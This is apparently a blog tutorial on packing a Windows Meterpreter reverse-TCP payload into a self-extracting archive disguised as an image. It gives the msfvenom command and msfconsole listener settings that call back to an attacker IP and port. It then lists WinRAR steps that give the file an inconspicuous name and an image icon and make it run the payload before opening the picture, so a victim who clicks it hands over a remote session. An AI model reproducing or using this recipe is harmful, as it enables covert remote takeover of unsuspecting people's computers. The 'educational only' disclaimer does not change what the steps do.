It’s less the trouble you imagined.
Just like not all payloads are same, creating a payload via an image is also not the same.
Note: This is strictly for educational purpose only. Do not try to break into any other machine which you are not authorized to.
- Idea on what a payload is and how it works.
- Linux machine(Any flavor)
- Windows machine(Target and working machine)
- An image
Step 1: Generating the executable payload.
Hop on to your linux machine(I am using Kali) and open a terminal. You can get your IP address by trying “ifconfig” or “ip a”.
To create our payload we will require Msfvenom. Type-in the following command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.168 LPORT=4444 -f exe -o /home/kali/Desktop/testviruse.exe
Make sure to change the “LHOST” value to your IP. You can change your port or leave it as default.
While on terminal, you can also start your listener. We will use msfconsole.
In the terminal give the following commands :
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.0.168
set exitonsession false
Make sure to change the LHOST and LORT according to your PC details.
Step 2: Making an Icon
Download an image. I got this:
Copy the payload created form your Linux machine to your windows machine.
We will now make an icon of our image. You can use any tool/site preferred. I would suggest: https://www.icoconverter.com/
Chose the original image and convert.
Step 3: Assembling the payload with the image
Select the payload(.exe file) and the image file(Original Image, not the icon). Right clcik on it and select “Add to archive…” option.
Under the System tab, give a name that can easily fit it and cannot be noticed. Under Archiving options, select Create SFX archive. If you have a size limitation, you can also chose the Compression method as Best. Select the Advanced option.
Select the SFX options.
In the Update tab, under Update mode, select Extract and update files. And under Overwrite mode, select Overwrite all files. Then select the Setup tab.
Give the names of your payload and the original image file archived. The program will set the execution order as mentioned here. So, the payload(testvirus.exe) will run first followed by the image(original.jfif). Click on Test and icon tab.
Attach the generated icon under Load SFX icon from the file option.
Click on ok….and your executable image is ready.
Step 4: Executing the payload
Now when the victim clicks on the icon, it starts the payload and then opens the actual image. This gives us a session in our Meterpreter, and we are in :)
That’s all for the post. Happy Hacking!